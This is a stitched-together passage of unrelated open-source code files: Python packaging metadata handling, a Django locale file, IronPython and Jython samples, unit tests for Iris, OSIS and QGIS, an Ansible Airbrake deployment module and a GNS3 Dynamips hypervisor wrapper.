if distinfo_dirname != self.path.split(os.sep)[-1]:
raise DistlibException(
'dist-info file %r does not belong to the %r %s '
'distribution' % (path, self.name, self.version))
# The file must be relative
if path not in DIST_FILES:
raise DistlibException('invalid path for a dist-info file: %r' %
path)
return os.path.join(self.path, path)
def list_distinfo_files(self):
"""
Iterates over the ``RECORD`` entries and returns paths for each line if
the path is pointing to a file located in the ``.dist-info`` directory
or one of its subdirectories.
:returns: iterator of paths
"""
base = os.path.dirname(self.path)
for path, checksum, size in self._get_records():
# XXX add separator or use real relpath algo
if not os.path.isabs(path):
path = os.path.join(base, path)
if path.startswith(self.path):
yield path
def __eq__(self, other):
return (isinstance(other, InstalledDistribution) and
self.path == other.path)
# See http://docs.python.org/reference/datamodel#object.__hash__
__hash__ = object.__hash__
class EggInfoDistribution(BaseInstalledDistribution):
"""Created with the *path* of the ``.egg-info`` directory or file provided
to the constructor. It reads the metadata contained in the file itself, or
if the given path happens to be a directory, the metadata is read from the
file ``PKG-INFO`` under that directory."""
requested = True # as we have no way of knowing, assume it was
shared_locations = {}
def __init__(self, path, env=None):
def set_name_and_version(s, n, v):
s.name = n
s.key = n.lower() # for case-insensitive comparisons
s.version = v
self.path = path
self.dist_path = env
if env and env._cache_enabled and path in env._cache_egg.path:
metadata = env._cache_egg.path[path].metadata
set_name_and_version(self, metadata['Name'], metadata['Version'])
else:
metadata = self._get_metadata(path)
# Need to be set before caching
set_name_and_version(self, metadata['Name'], metadata['Version'])
if env and env._cache_enabled:
env._cache_egg.add(self)
super(EggInfoDistribution, self).__init__(metadata, path, env)
def _get_metadata(self, path):
requires = None
def parse_requires(req_path):
"""Create a list of dependencies from a requires.txt file.
*req_path* must be the path to a setuptools-produced requires.txt file.
"""
reqs = []
try:
with open(req_path, 'r') as fp:
lines = fp.read().splitlines()
except IOError:
return reqs
for line in lines:
line = line.strip()
if line.startswith('['):
logger.warning('Unexpected line: quitting requirement scan: %r',
line)
break
r = parse_requirement(line)
if not r:
logger.warning('Not recognised as a requirement: %r', line)
continue
if r.extras:
logger.warning('extra requirements in requires.txt are '
'not supported')
if not r.constraints:
reqs.append(r.name)
else:
cons = ', '.join('%s%s' % c for c in r.constraints)
reqs.append('%s (%s)' % (r.name, cons))
return reqs
if path.endswith('.egg'):
if os.path.isdir(path):
meta_path = os.path.join(path, 'EGG-INFO', 'PKG-INFO')
metadata = Metadata(path=meta_path, scheme='legacy')
req_path = os.path.join(path, 'EGG-INFO', 'requires.txt')
requires = parse_requires(req_path)
else:
# FIXME handle the case where zipfile is not available
zipf = zipimport.zipimporter(path)
fileobj = StringIO(
zipf.get_data('EGG-INFO/PKG-INFO').decode('utf8'))
metadata = Metadata(fileobj=fileobj, scheme='legacy')
try:
requires = zipf.get_data('EGG-INFO/requires.txt')
except IOError:
requires = None
elif path.endswith('.egg-info'):
if os.path.isdir(path):
path = os.path.join(path, 'PKG-INFO')
req_path = os.path.join(path, 'requires.txt')
requires = parse_requires(req_path)
metadata = Metadata(path=path, scheme='legacy')
else:
raise DistlibException('path must end with .egg-info or .egg, '
'got %r' % path)
if requires:
if metadata['Metadata-Version'] == '1.1':
# we can't have 1.1 metadata *and* Setuptools requires
for field in ('Obsoletes', 'Requires', 'Provides'):
if field in metadata:
del metadata[field]
metadata['Requires-Dist'] += requires
return metadata
def __repr__(self):
return '<EggInfoDistribution %r %s at %r>' % (
self.name, self.version, self.path)
def __str__(self):
return "%s %s" % (self.name, self.version)
def check_installed_files(self):
"""
Checks that the hashes and sizes of the files in ``RECORD`` are
matched by the files themselves. Returns a (possibly empty) list of
mismatches. Each entry in the mismatch list will be a tuple consisting
of the path, 'exists', 'size' or 'hash' according to what didn't match
(existence is checked first, then size, then hash), the expected
value and the actual value.
"""
mismatches = []
record_path = os.path.join(self.path, 'installed-files.txt')
if os.path.exists(record_path):
for path, hash, size in self.list_installed_files():
if path == record_path:
continue
if not os.path.exists(path):
mismatches.append((path, 'exists', True, False))
return mismatches
def list_installed_files(self, local=False):
"""
Iterates over the ``installed-files.txt`` entries and returns a tuple
``(path, hash, size)`` for each line.
:returns: a list of (path, hash, size)
"""
def _md5(path):
f = open(path, 'rb')
try:
content = f.read()
finally:
f.close()
return hashlib.md5(content).hexdigest()
def _size(path):
return os.stat(path).st_size
record_path = os.path.join(self.path, 'installed-files.txt')
result = []
if os.path.exists(record_path):
with codecs.open(record_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
p = os.path.normpath(os.path.join(self.path, line))
# "./" is present as a marker between installed files
# and installation metadata files
if not os.path.exists(p):
logger.warning('Non-existent file: %s', p)
if p.endswith(('.pyc', '.pyo')):
continue
#otherwise fall through and fail
if not os.path.isdir(p):
result.append((p, _md5(p), _size(p)))
result.append((record_path, None, None))
return result
def list_distinfo_files(self, local=False):
"""
Iterates over the ``installed-files.txt`` entries and returns paths for
each line if the path is pointing to a file located in the
``.egg-info`` directory or one of its subdirectories.
:parameter local: If *local* is ``True``, each returned path is
transformed into a local absolute path. Otherwise the
raw value from ``installed-files.txt`` is returned.
:type local: boolean
:returns: iterator of paths
"""
record_path = os.path.join(self.path, 'installed-files.txt')
skip = True
with codecs.open(record_path, 'r', encoding='utf-8') as f:
for line in f:
line = line.strip()
if line == './':
skip = False
continue
if not skip:
p = os.path.normpath(os.path.join(self.path, line))
if p.startswith(self.path):
if local:
yield p
else:
yield line
def __eq__(self, other):
return (isinstance(other, EggInfoDistribution) and
self.path == other.path)
# See http://docs.python.org/reference/datamodel#object.__hash__
__hash__ = object.__hash__
new_dist_class = InstalledDistribution
old_dist_class = EggInfoDistribution
class DependencyGraph(object):
"""
Represents a dependency graph between distributions.
The dependency relationships are stored in an ``adjacency_list`` that maps
distributions to a list of ``(other, label)`` tuples where ``other``
is a distribution and the edge is labeled with ``label`` (i.e. the version
specifier, if such was provided). Also, for more efficient traversal, for
every distribution ``x``, a list of predecessors is kept in
``reverse_list[x]``. An edge from distribution ``a`` to
distribution ``b`` means that ``a`` depends on ``b``. If any missing
dependencies are found, they are stored in ``missing``, which is a
dictionary that maps distributions to a list of requirements that were not
provided by any other distributions.
"""
def __init__(self):
self.adjacency_list = {}
self.reverse_list = {}
self.missing = {}
def add_distribution(self, distribution):
"""Add the *distribution* to the graph.
:type distribution: :class:`distutils2.database.InstalledDistribution`
or :class:`distutils2.database.EggInfoDistribution`
"""
self.adjacency_list[distribution] = []
self.reverse_list[distribution] = []
#self.missing[distribution] = []
def add_edge(self, x, y, label=None):
"""Add an edge from distribution *x* to distribution *y* with the given
*label*.
:type x: :class:`distutils2.database.InstalledDistribution` or
:class:`distutils2.database.EggInfoDistribution`
:type y: :class:`distutils2.database.InstalledDistribution` or
:class:`distutils2.database.EggInfoDistribution`
:type label: ``str`` or ``None``
"""
self.adjacency_list[x].append((y, label))
# multiple edges are allowed, so be careful
if x not in self.reverse_list[y]:
self.reverse_list[y].append(x)
def add_missing(self, distribution, requirement):
"""
Add a missing *requirement* for the given *distribution*.
:type distribution: :class:`distutils2.database.InstalledDistribution`
or :class:`distutils2.database.EggInfoDistribution`
:type requirement: ``str``
"""
logger.debug('%s missing %r', distribution, requirement)
self.missing.setdefault(distribution, []).append(requirement)
def _repr_dist(self, dist):
return '%s %s' % (dist.name, dist.version)
def repr_node(self, dist, level=1):
"""Prints only a subgraph"""
output = [self._repr_dist(dist)]
for other, label in self.adjacency_list[dist]:
dist = self._repr_dist(other)
if label is not None:
dist = '%s [%s]' % (dist, label)
output.append(' ' * level + str(dist))
suboutput = self.repr_node(other, level + 1)
subs = suboutput.split('\n')
output.extend(subs[1:])
return '\n'.join(output)
def to_dot(self, f, skip_disconnected=True):
"""Writes a DOT output for the graph to the provided file *f*.
If *skip_disconnected* is set to ``True``, then all distributions
that are not dependent on any other distribution are skipped.
:type f: has to support ``file``-like operations
:type skip_disconnected: ``bool``
"""
disconnected = []
f.write("digraph dependencies {\n")
for dist, adjs in self.adjacency_list.items():
if len(adjs) == 0 and not skip_disconnected:
disconnected.append(dist)
for other, label in adjs:
if not label is None:
f.write('"%s" -> "%s" [label="%s"]\n' %
(dist.name, other.name, label))
else:
f.write('"%s" -> "%s"\n' % (dist.name, other.name))
if not skip_disconnected and len(disconnected) > 0:
f.write('subgraph disconnected {\n')
f.write('label = "Disconnected"\n')
f.write('bgcolor = red\n')
for dist in disconnected:
f.write('"%s"' % dist.name)
f.write('\n')
f.write('}\n')
f.write('}\n')
def topological_sort(self):
"""
Perform a topological sort of the graph.
:return: A tuple, the first element of which is a topologically sorted
list of distributions, and the second element of which is a
list of distributions that cannot be sorted because they have
circular dependencies and so form a cycle.
"""
result = []
# Make a shallow copy of the adjacency list
alist = {}
for k, v in self.adjacency_list.items():
alist[k] = v[:]
while True:
# See what we can remove in this run
to_remove = []
for k, v in list(alist.items())[:]:
if not v:
to_remove.append(k)
del alist[k]
if not to_remove:
# What's left in alist (if anything) is a cycle.
break
# Remove from the adjacency list of others
for k, v in alist.items():
alist[k] = [(d, r) for d, r in v if d not in to_remove]
logger.debug('Moving to result: %s',
['%s (%s)' % (d.name, d.version) for d in to_remove])
result.extend(to_remove)
return result, list(alist.keys())
def __repr__(self):
"""Representation of the graph"""
output = []
for dist, adjs in self.adjacency_list.items():
output.append(self.repr_node(dist))
return '\n'.join(output)
def make_graph(dists, scheme='default'):
"""Makes a dependency graph from the given distributions.
:parameter dists: a list of distributions
:type dists: list of :class:`distutils2.database.InstalledDistribution` and
:class:`distutils2.database.EggInfoDistribution` instances
:rtype: a :class:`DependencyGraph` instance
"""
scheme = get_scheme(scheme)
graph = DependencyGraph()
provided = {} # maps names to lists of (version, dist) tuples
# first, build the graph and find out what's provided
for dist in dists:
graph.add_distribution(dist)
for p in dist.provides:
comps = p.strip().rsplit(" ", 1)
name = comps[0]
version = None
if len(comps) == 2:
version = comps[1]
if len(version) < 3 or version[0] != '(' or version[-1] != ')':
logger.warning('distribution %r has ill-formed '
'provides field: %r', dist.name, p)
continue
# don't raise an exception. Legacy installed distributions
# could have all manner of metadata
#raise DistlibException('distribution %r has ill-formed '
# 'provides field: %r' % (dist.name, p))
version = version[1:-1] # trim off parenthesis
# Add name in lower case for case-insensitivity
name = name.lower()
logger.debug('Add to provided: %s, %s, %s', name, version, dist)
provided.setdefault(name, []).append((version, dist))
# now make the edges
for dist in dists:
requires = (dist.requires | dist.setup_requires)
for req in requires:
try:
matcher = scheme.matcher(req)
except UnsupportedVersionError:
# XXX compat-mode if cannot read the version
logger.warning('could not read version %r - using name only',
req)
name = req.split()[0]
matcher = scheme.matcher(name)
name = matcher.key # case-insensitive
matched = False
if name in provided:
for version, provider in provided[name]:
try:
match = matcher.match(version)
except UnsupportedVersionError:
match = False
if match:
graph.add_edge(dist, provider, req)
matched = True
break
if not matched:
graph.add_missing(dist, req)
return graph
def get_dependent_dists(dists, dist):
"""Recursively generate a list of distributions from *dists* that are
dependent on *dist*.
:param dists: a list of distributions
:param dist: a distribution, member of *dists* for which we are interested
"""
if dist not in dists:
raise DistlibException('given distribution %r is not a member '
'of the list' % dist.name)
graph = make_graph(dists)
dep = [dist] # dependent distributions
todo = graph.reverse_list[dist] # list of nodes we should inspect
while todo:
d = todo.pop()
dep.append(d)
for succ in graph.reverse_list[d]:
if succ not in dep:
todo.append(succ)
dep.pop(0) # remove dist from dep, was there to prevent infinite loops
return dep
def get_required_dists(dists, dist):
"""Recursively generate a list of distributions from *dists* that are
required by *dist*.
:param dists: a list of distributions
:param dist: a distribution, member of *dists* for which we are interested
"""
if dist not in dists:
raise DistlibException('given distribution %r is not a member '
'of the list' % dist.name)
graph = make_graph(dists)
req = [] # required distributions
todo = graph.adjacency_list[dist] # list of nodes we should inspect
while todo:
d = todo.pop()[0]
req.append(d)
for pred in graph.adjacency_list[d]:
if pred not in req:
todo.append(pred)
return req
def make_dist(name, version, **kwargs):
"""
A convenience method for making a dist given just a name and version.
"""
md = Metadata(**kwargs)
md['Name'] = name
md['Version'] = version
return Distribution(md)
| apache-2.0 | 6,840,298,047,811,313,000 | 37.129131 | 86 | 0.545015 | false |
golismero/golismero-devel | thirdparty_libs/django/conf/locale/nb/formats.py | 107 | 1585 | # -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'j. F Y'
TIME_FORMAT = 'H:i'
DATETIME_FORMAT = 'j. F Y H:i'
YEAR_MONTH_FORMAT = 'F Y'
MONTH_DAY_FORMAT = 'j. F'
SHORT_DATE_FORMAT = 'd.m.Y'
SHORT_DATETIME_FORMAT = 'd.m.Y H:i'
FIRST_DAY_OF_WEEK = 1 # Monday
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# Kept ISO formats as they are in first position
DATE_INPUT_FORMATS = (
'%Y-%m-%d', '%d.%m.%Y', '%d.%m.%y', # '2006-10-25', '25.10.2006', '25.10.06'
# '%d. %b %Y', '%d %b %Y', # '25. okt 2006', '25 okt 2006'
# '%d. %b. %Y', '%d %b. %Y', # '25. okt. 2006', '25 okt. 2006'
# '%d. %B %Y', '%d %B %Y', # '25. oktober 2006', '25 oktober 2006'
)
DATETIME_INPUT_FORMATS = (
'%Y-%m-%d %H:%M:%S', # '2006-10-25 14:30:59'
'%Y-%m-%d %H:%M', # '2006-10-25 14:30'
'%Y-%m-%d', # '2006-10-25'
'%d.%m.%Y %H:%M:%S', # '25.10.2006 14:30:59'
'%d.%m.%Y %H:%M', # '25.10.2006 14:30'
'%d.%m.%Y', # '25.10.2006'
'%d.%m.%y %H:%M:%S', # '25.10.06 14:30:59'
'%d.%m.%y %H:%M', # '25.10.06 14:30'
'%d.%m.%y', # '25.10.06'
)
DECIMAL_SEPARATOR = ','
THOUSAND_SEPARATOR = '\xa0' # non-breaking space
NUMBER_GROUPING = 3
| gpl-2.0 | 2,050,092,660,626,518,800 | 39.641026 | 81 | 0.535016 | false |
jstammers/EDMSuite | NavPython/IronPython/Tutorial/Extend/csxtest.py | 1 | 1219 | #####################################################################################
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# This source code is subject to terms and conditions of the Apache License, Version 2.0. A
# copy of the license can be found in the License.html file at the root of this distribution. If
# you cannot locate the Apache License, Version 2.0, please send an email to
# [email protected]. By using this source code in any fashion, you are agreeing to be bound
# by the terms of the Apache License, Version 2.0.
#
# You must not remove this notice, or any other, from this software.
#
#
#####################################################################################
# Task 1
import clr
clr.AddReferenceToFile("csextend.dll")
import Simple
dir(Simple)
s = Simple(10)
print s
# Task 2
import clr
clr.AddReferenceToFile("csextend.dll")
import Simple
dir(Simple)
s = Simple(10)
for i in s: print i
# Task 3
import clr
clr.AddReferenceToFile("csextend.dll")
import Simple
dir(Simple)
a = Simple(10)
b = Simple(20)
a + b
# Task 4
import clr
clr.AddReferenceToFile("csextend.dll")
import Simple
a = Simple(10)
def X(i):
return i + 100
a.Transform(X)
| mit | 5,197,148,566,254,455,000 | 22 | 97 | 0.628384 | false |
pgleeson/TestArea | lib/jython/Lib/test/test_methods.py | 10 | 1114 | # Python test set -- part 7, bound and unbound methods
from test_support import *
print 'Bound and unbound methods (test_methods.py)'
class A:
def one(self): return 'one'
class B(A):
def two(self): return 'two'
class C(A):
def one(self): return 'another one'
a = A()
b = B()
c = C()
print 'unbound method equality'
assert A.one == B.one
assert A.one <> C.one
print 'method attributes'
assert A.one.im_func == a.one.im_func
assert a.one.im_self == a
assert a.one.im_class == A
assert b.one.im_self == b
assert b.one.im_class == B
print 'unbound method invocation w/ explicit self'
assert A.one(b) == 'one'
assert B.two(b) == 'two'
assert B.one(b) == 'one'
assert A.one(c) == 'one'
assert C.one(c) == 'another one'
assert A.one(a) == 'one'
try:
B.one(a)
assert 0
except TypeError:
pass
try:
C.one(a)
assert 0
except TypeError:
pass
print '"unbound" methods of builtin types'
w = [1,2,3].append
x = [4,5,6].append
assert w <> x
assert w.__self__ <> x.__self__
y = w.__self__[:]
z = x.__self__[:]
assert y.append.__self__ <> w
z.append(7)
assert z == (x.__self__+[7])
| gpl-2.0 | -5,978,282,553,769,381,000 | 16.967742 | 54 | 0.61939 | false |
rhattersley/iris | lib/iris/tests/unit/fileformats/pp_rules/test__dim_or_aux.py | 12 | 2233 | # (C) British Crown Copyright 2014 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""Unit tests for :func:`iris.fileformats.pp_rules._dim_or_aux`."""
from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip) # noqa
# Import iris.tests first so that some things can be initialised before
# importing anything else.
import iris.tests as tests
from iris.coords import DimCoord, AuxCoord
from iris.fileformats.pp_rules import _dim_or_aux
class Test(tests.IrisTest):
def setUp(self):
self.mono = list(range(5))
self.non_mono = [0, 1, 3, 2, 4]
self.std_name = 'depth'
self.units = 'm'
self.attr = {'positive': 'up',
'wibble': 'wobble'}
def test_dim_monotonic(self):
result = _dim_or_aux(self.mono, standard_name=self.std_name,
units=self.units, attributes=self.attr.copy())
expected = DimCoord(self.mono, standard_name=self.std_name,
units=self.units, attributes=self.attr)
self.assertEqual(result, expected)
def test_dim_non_monotonic(self):
result = _dim_or_aux(self.non_mono, standard_name=self.std_name,
units=self.units, attributes=self.attr.copy())
attr = self.attr.copy()
del attr['positive']
expected = AuxCoord(self.non_mono, standard_name=self.std_name,
units=self.units, attributes=attr)
self.assertEqual(result, expected)
if __name__ == "__main__":
tests.main()
| lgpl-3.0 | 2,609,937,718,619,282,000 | 38.175439 | 75 | 0.655172 | false |
uclouvain/osis_louvain | assessments/tests/views/test_score_sheet.py | 1 | 5429 | ##############################################################################
#
# OSIS stands for Open Student Information System. It's an application
# designed to manage the core business of higher education institutions,
# such as universities, faculties, institutes and professional schools.
# The core business involves the administration of students, teachers,
# courses, programs and so on.
#
# Copyright (C) 2015-2018 Université catholique de Louvain (http://www.uclouvain.be)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# A copy of this license - GNU General Public License - is available
# at the root of the source code of this program. If not,
# see http://www.gnu.org/licenses/.
#
##############################################################################
import datetime
from unittest import mock
from django.core.urlresolvers import reverse
from django.test import TestCase, RequestFactory
from base.tests.factories.academic_year import AcademicYearFactory
from base.tests.factories.offer_year import OfferYearFactory
from assessments.views import score_sheet
from assessments.forms.score_sheet_address import ScoreSheetAddressForm
from django.test import Client
from base.tests.factories.user import SuperUserFactory
class OfferScoreSheetTabViewTest(TestCase):
def setUp(self):
today = datetime.date.today()
self.academic_year = AcademicYearFactory(start_date=today,
end_date=today.replace(year=today.year + 1),
year=today.year)
self.offer_year = OfferYearFactory(academic_year=self.academic_year)
self.COMMON_CONTEXT_KEYS = ['offer_year', 'countries', 'is_program_manager', 'entity_versions']
def test_get_common_context(self):
request = mock.Mock(method='GET')
context = score_sheet._get_common_context(request, self.offer_year.id)
self.assert_list_contains(list(context.keys()), self.COMMON_CONTEXT_KEYS)
@mock.patch('django.contrib.auth.decorators')
@mock.patch('base.views.layout.render')
def test_offer_score_encoding_tab(self, mock_render, mock_decorators):
mock_decorators.login_required = lambda x: x
mock_decorators.permission_required = lambda *args, **kwargs: lambda func: func
request_factory = RequestFactory()
request = request_factory.get(reverse('offer_score_encoding_tab', args=[self.offer_year.id]))
request.user = mock.Mock()
score_sheet.offer_score_encoding_tab(request, self.offer_year.id)
self.assertTrue(mock_render.called)
request, template, context = mock_render.call_args[0]
self.assertEqual(template, 'offer/score_sheet_address_tab.html')
context_keys = self.COMMON_CONTEXT_KEYS + ['entity_id_selected', 'form']
self.assert_list_contains(list(context.keys()), context_keys)
self.assertEqual(context['offer_year'], self.offer_year)
def assert_list_contains(self, container, member):
self.assertFalse([item for item in member if item not in container])
@mock.patch('assessments.business.score_encoding_sheet.save_address_from_entity')
@mock.patch('django.contrib.messages.add_message')
def test_save_score_sheet_address_case_reuse_entity_address(self,
mock_add_message,
mock_save_address_from_entity):
self.a_superuser = SuperUserFactory()
self.client.force_login(self.a_superuser)
url = reverse('save_score_sheet_address', args=[self.offer_year.id])
response = self.client.post(url, data={'related_entity': 1234})
self.assertTrue(mock_add_message.called)
self.assertEqual(response.url, reverse('offer_score_encoding_tab', args=[self.offer_year.id]))
@mock.patch('assessments.views.score_sheet._save_customized_address')
@mock.patch('django.contrib.auth.decorators')
@mock.patch('base.views.layout.render')
def test_save_score_sheet_address_case_customized_address(self, mock_render, mock_decorators, mock_save_customized_address):
mock_decorators.login_required = lambda x: x
mock_decorators.permission_required = lambda *args, **kwargs: lambda func: func
mock_save_customized_address.return_value = ScoreSheetAddressForm()
request_factory = RequestFactory()
request = request_factory.post(reverse('save_score_sheet_address', args=[self.offer_year.id]))
request.user = mock.Mock()
score_sheet.save_score_sheet_address(request, self.offer_year.id)
self.assertTrue(mock_render.called)
request, template, context = mock_render.call_args[0]
self.assertEqual(template, 'offer/score_sheet_address_tab.html')
self.assert_list_contains(list(context.keys()), self.COMMON_CONTEXT_KEYS + ['form'])
| agpl-3.0 | 5,302,085,797,211,989,000 | 50.207547 | 128 | 0.66986 | false |
ogenstad/ansible | lib/ansible/modules/monitoring/airbrake_deployment.py | 56 | 3599 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2013 Bruce Pennypacker <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: airbrake_deployment
version_added: "1.2"
author: "Bruce Pennypacker (@bpennypacker)"
short_description: Notify airbrake about app deployments
description:
- Notify airbrake about app deployments (see http://help.airbrake.io/kb/api-2/deploy-tracking)
options:
token:
description:
- API token.
required: true
environment:
description:
- The airbrake environment name, typically 'production', 'staging', etc.
required: true
user:
description:
- The username of the person doing the deployment
required: false
repo:
description:
- URL of the project repository
required: false
revision:
description:
- A hash, number, tag, or other identifier showing what revision was deployed
required: false
url:
description:
- Optional URL to submit the notification to. Use to send notifications to Airbrake-compliant tools like Errbit.
required: false
default: "https://airbrake.io/deploys.txt"
version_added: "1.5"
validate_certs:
description:
- If C(no), SSL certificates for the target url will not be validated. This should only be used
on personally controlled sites using self-signed certificates.
required: false
default: 'yes'
choices: ['yes', 'no']
requirements: []
'''
EXAMPLES = '''
- airbrake_deployment:
token: AAAAAA
environment: staging
user: ansible
revision: '4.2'
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.urls import fetch_url
from ansible.module_utils.six.moves.urllib.parse import urlencode
# ===========================================
# Module execution.
#
def main():
module = AnsibleModule(
argument_spec=dict(
token=dict(required=True, no_log=True),
environment=dict(required=True),
user=dict(required=False),
repo=dict(required=False),
revision=dict(required=False),
url=dict(required=False, default='https://api.airbrake.io/deploys.txt'),
validate_certs=dict(default='yes', type='bool'),
),
supports_check_mode=True
)
# build list of params
params = {}
if module.params["environment"]:
params["deploy[rails_env]"] = module.params["environment"]
if module.params["user"]:
params["deploy[local_username]"] = module.params["user"]
if module.params["repo"]:
params["deploy[scm_repository]"] = module.params["repo"]
if module.params["revision"]:
params["deploy[scm_revision]"] = module.params["revision"]
params["api_key"] = module.params["token"]
url = module.params.get('url')
# If we're in check mode, just exit pretending like we succeeded
if module.check_mode:
module.exit_json(changed=True)
# Send the data to airbrake
data = urlencode(params)
response, info = fetch_url(module, url, data=data)
if info['status'] == 200:
module.exit_json(changed=True)
else:
module.fail_json(msg="HTTP result code: %d connecting to %s" % (info['status'], url))
if __name__ == '__main__':
main()
| gpl-3.0 | -2,904,783,041,118,055,400 | 27.338583 | 118 | 0.642956 | false |
harrijs/gns3-server | gns3server/modules/dynamips/hypervisor.py | 1 | 6210 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2015 GNS3 Technologies Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Represents a Dynamips hypervisor and starts/stops the associated Dynamips process.
"""
import os
import subprocess
import tempfile
import asyncio
from .dynamips_hypervisor import DynamipsHypervisor
from .dynamips_error import DynamipsError
import logging
log = logging.getLogger(__name__)
class Hypervisor(DynamipsHypervisor):
"""
Hypervisor.
:param path: path to Dynamips executable
:param working_dir: working directory
:param host: host/address for this hypervisor
:param port: port for this hypervisor
:param console_host: host/address for console connections
"""
_instance_count = 1
def __init__(self, path, working_dir, host, port, console_host):
super().__init__(working_dir, host, port)
# create an unique ID
self._id = Hypervisor._instance_count
Hypervisor._instance_count += 1
self._console_host = console_host
self._path = path
self._command = []
self._process = None
self._stdout_file = ""
self._started = False
@property
def id(self):
"""
Returns the unique ID for this hypervisor.
:returns: id (integer)
"""
return self._id
@property
def started(self):
"""
Returns either this hypervisor has been started or not.
:returns: boolean
"""
return self._started
@property
def path(self):
"""
Returns the path to the Dynamips executable.
:returns: path to Dynamips
"""
return self._path
@path.setter
def path(self, path):
"""
Sets the path to the Dynamips executable.
:param path: path to Dynamips
"""
self._path = path
@asyncio.coroutine
def start(self):
"""
Starts the Dynamips hypervisor process.
"""
self._command = self._build_command()
try:
log.info("Starting Dynamips: {}".format(self._command))
with tempfile.NamedTemporaryFile(delete=False) as fd:
self._stdout_file = fd.name
log.info("Dynamips process logging to {}".format(fd.name))
self._process = yield from asyncio.create_subprocess_exec(*self._command,
stdout=fd,
stderr=subprocess.STDOUT,
cwd=self._working_dir)
log.info("Dynamips process started PID={}".format(self._process.pid))
self._started = True
except (OSError, subprocess.SubprocessError) as e:
log.error("Could not start Dynamips: {}".format(e))
raise DynamipsError("Could not start Dynamips: {}".format(e))
@asyncio.coroutine
def stop(self):
"""
Stops the Dynamips hypervisor process.
"""
if self.is_running():
log.info("Stopping Dynamips process PID={}".format(self._process.pid))
yield from DynamipsHypervisor.stop(self)
# give some time for the hypervisor to properly stop.
# time to delete UNIX NIOs for instance.
yield from asyncio.sleep(0.01)
try:
yield from asyncio.wait_for(self._process.wait(), timeout=3)
except asyncio.TimeoutError:
if self._process.returncode is None:
log.warn("Dynamips process {} is still running... killing it".format(self._process.pid))
self._process.kill()
if self._stdout_file and os.access(self._stdout_file, os.W_OK):
try:
os.remove(self._stdout_file)
except OSError as e:
log.warning("could not delete temporary Dynamips log file: {}".format(e))
self._started = False
def read_stdout(self):
"""
Reads the standard output of the Dynamips process.
Only use when the process has been stopped or has crashed.
"""
output = ""
if self._stdout_file and os.access(self._stdout_file, os.R_OK):
try:
with open(self._stdout_file, "rb") as file:
output = file.read().decode("utf-8", errors="replace")
except OSError as e:
log.warn("could not read {}: {}".format(self._stdout_file, e))
return output
def is_running(self):
"""
Checks if the process is running
:returns: True or False
"""
if self._process and self._process.returncode is None:
return True
return False
def _build_command(self):
"""
Command to start the Dynamips hypervisor process.
(to be passed to subprocess.Popen())
"""
command = [self._path]
command.extend(["-N1"]) # use instance IDs for filenames
command.extend(["-l", "dynamips_i{}_log.txt".format(self._id)]) # log file
# Dynamips cannot listen for hypervisor commands and for console connections on
# 2 different IP addresses.
# See https://github.com/GNS3/dynamips/issues/62
if self._console_host != "0.0.0.0" and self._console_host != "::":
command.extend(["-H", "{}:{}".format(self._host, self._port)])
else:
command.extend(["-H", str(self._port)])
return command
| gpl-3.0 | 3,943,120,844,863,544,300 | 31.010309 | 108 | 0.578744 | false |
boundlessgeo/QGIS | python/plugins/processing/tests/ProjectProvider.py | 8 | 4883 | # -*- coding: utf-8 -*-
"""
***************************************************************************
Project Provider tests
---------------------
Date : July 2018
Copyright : (C) 2018 by Nyall Dawson
Email : nyall dot dawson at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************8
"""
__author__ = 'Nyall Dawson'
__date__ = 'July 2018'
__copyright__ = '(C) 2018, Nyall Dawson'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from qgis.testing import start_app, unittest
from qgis.PyQt.QtCore import QTemporaryFile
from qgis.core import (QgsApplication,
QgsProcessingModelAlgorithm,
QgsProject)
from processing.modeler.ProjectProvider import ProjectProvider
from processing.modeler.ModelerDialog import ModelerDialog
start_app()
class ProjectProviderTest(unittest.TestCase):
def testSaveRestoreFromProject(self):
p = QgsProject()
provider = ProjectProvider(p)
# add some algorithms
alg = QgsProcessingModelAlgorithm('test name', 'test group')
provider.add_model(alg)
alg2 = QgsProcessingModelAlgorithm('test name2', 'test group2')
provider.add_model(alg2)
